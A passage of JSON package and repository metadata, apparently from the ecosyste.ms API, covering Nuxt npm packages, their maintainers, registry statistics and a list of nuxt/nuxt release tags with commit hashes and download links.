"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-12T01:36:26.424Z","updated_at":"2026-02-12T01:36:26.424Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-20T00:31:52.206Z","updated_at":"2023-08-20T00:31:52.206Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096140,"name":"@nuxt/vue-app","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:17:06.493Z","latest_release_published_at":"2024-06-28T11:34:53.381Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T11:28:00.382Z","created_at":"2022-04-08T10:39:36.958Z","updated_at":"2026-05-11T11:28:00.383Z","registry_url":"https://www.npmjs.com/package/@nuxt/vue-app","install_command":"npm install @nuxt/vue-app","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"